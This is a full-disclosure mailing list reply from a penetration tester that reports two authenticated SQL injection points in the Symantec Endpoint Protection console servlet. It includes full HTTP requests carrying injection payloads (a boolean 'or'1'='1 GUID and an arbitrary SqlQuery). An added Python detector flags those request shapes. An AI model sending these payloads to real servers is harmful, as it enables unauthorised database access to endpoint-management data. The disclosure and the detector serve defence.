List:       full-disclosure
Subject:    Re: [FD] Symantec Endpoint Protection
From:       Markus Wulftange <markus.wulftange () code-white ! com>
Date:       2015-08-03 11:19:56
Message-ID: 55BF4E5C.4040404 () code-white ! com


Hi Brandon,

we found two injection points. One in the BinaryFileHandler class:

    POST /servlet/ConsoleServlet HTTP/1.1
    Host: 192.168.40.133:8443
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 51
    Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

    ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1

And one in the ExpRecordHandler class:

    POST /servlet/ConsoleServlet HTTP/1.1
    Host: 192.168.40.133:8443
    Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175;
    REQUESTSIG=09E0C480920F594CBD036BD07DC9A0B13198C99E8AFD93C83A2174710122381CD74369B6A1F2A53CA3121 \
    005A65062406DCDDBDCADCE182A532F8D1C47DCC6730CA872CA488D26A8A9E0CF296B99FEC0165F757A486DC66D28012 \
    BDD15C4C0F151AFF64A8F4724161C26C2D820D3BB14C248C0E748852BE52CBEE7CC5C04E5E26B415AD471A2FD03E4151798DE7021B8
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 329

    ActionType=ExpRecord&ObjectType=SemClient&SqlQuery=SELECT+@@version+AS+CLIENT_ID,DOMAIN_ID,GROUP \
    _ID,GROUP_IS_OU,OU_GUID,POLICY_MODE,COMPUTER_ID,HARDWARE_KEY,COMPUTER_NAME,COMPUTER_DOMAIN_NAME, \
    DESCRIPTION,USER_NAME,FULL_NAME,USER_DOMAIN_NAME,HASH,PIN_MARK,EXTRA_FEATURE,CREATOR,CREATION_TIME,USN,TIME_STAMP,DELETED+from+SEM_CLIENT


Both require authentication. The latter does also require a request
signature REQUESTSIG, which is based on the requested parameters and a
hard-coded key.


-- 
Markus Wulftange
Senior Penetration Tester

Code White GmbH
Magirus-Deutz-Straße 18
89077 Ulm

E-Mail markus.wulftange@code-white.com
PGP    C6D6 C18B BAB9 0089 6942 213D 7772 8552 E9F8 6F39

http://www.code-white.com

Code White GmbH
Sitz und Registergericht/Domicile and Register Court: Stuttgart,
HRB-Nr./Commercial Register No.: 749152
Geschäftsführung/Management: Dr. Helmut Mahler, Andreas Melzner, Lüder
Sachse
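
Added example, not part of the original message and not the vendor's code: a detection check for the two request shapes described above, run over form bodies captured from POSTs to `/servlet/ConsoleServlet`. It assumes a legitimate `GUID` is 32 hex digits (optionally hyphenated) and a legitimate `SqlQuery` is a plain column list from a single table; both patterns and the function name are assumptions to adjust against known-good console traffic.

```python
import re
from urllib.parse import parse_qs

# Assumption: a well-formed GUID is 32 hex digits, optionally 8-4-4-4-12.
GUID_RE = re.compile(r"[0-9A-Fa-f]{8}-?(?:[0-9A-Fa-f]{4}-?){3}[0-9A-Fa-f]{12}")
# Assumption: a benign export query is "SELECT col[, col...] FROM table".
IDENT = r"[A-Za-z_][A-Za-z0-9_]*"
PLAIN_SELECT_RE = re.compile(
    rf"\s*SELECT\s+{IDENT}(?:\s*,\s*{IDENT})*\s+FROM\s+{IDENT}\s*", re.IGNORECASE)

def review_console_request(path, body):
    """Return findings for one POST (path + urlencoded body) to the console servlet."""
    findings = []
    if not path.startswith("/servlet/ConsoleServlet"):
        return findings
    # parse_qs URL-decodes values ('+' becomes a space); keep empty values too.
    params = parse_qs(body, keep_blank_values=True)
    action_type = params.get("ActionType", [""])[0]
    if action_type == "BinaryFile":
        for guid in params.get("GUID", []):
            if not GUID_RE.fullmatch(guid):
                findings.append("BinaryFile: GUID is not a well-formed GUID")
    elif action_type == "ExpRecord":
        for query in params.get("SqlQuery", []):
            if not PLAIN_SELECT_RE.fullmatch(query):
                findings.append("ExpRecord: SqlQuery is not a plain column select")
    return findings

# Constructed sample bodies: the first two follow the request shapes in the
# message (the second is shortened), the last two are constructed benign ones.
SAMPLES = [
    "ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1",
    "ActionType=ExpRecord&ObjectType=SemClient"
    "&SqlQuery=SELECT+@@version+AS+CLIENT_ID,DOMAIN_ID+from+SEM_CLIENT",
    "ActionType=BinaryFile&Action=EXISTS&GUID=0123456789ABCDEF0123456789ABCDEF",
    "ActionType=ExpRecord&ObjectType=SemClient"
    "&SqlQuery=SELECT+CLIENT_ID,DOMAIN_ID+from+SEM_CLIENT",
]

def scan(bodies, path="/servlet/ConsoleServlet"):
    """Map each body to its findings, keeping only the ones that were flagged."""
    results = {body: review_console_request(path, body) for body in bodies}
    return {body: found for body, found in results.items() if found}

if __name__ == "__main__":
    for body, found in scan(SAMPLES).items():
        print(found, "<-", body[:60])
```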

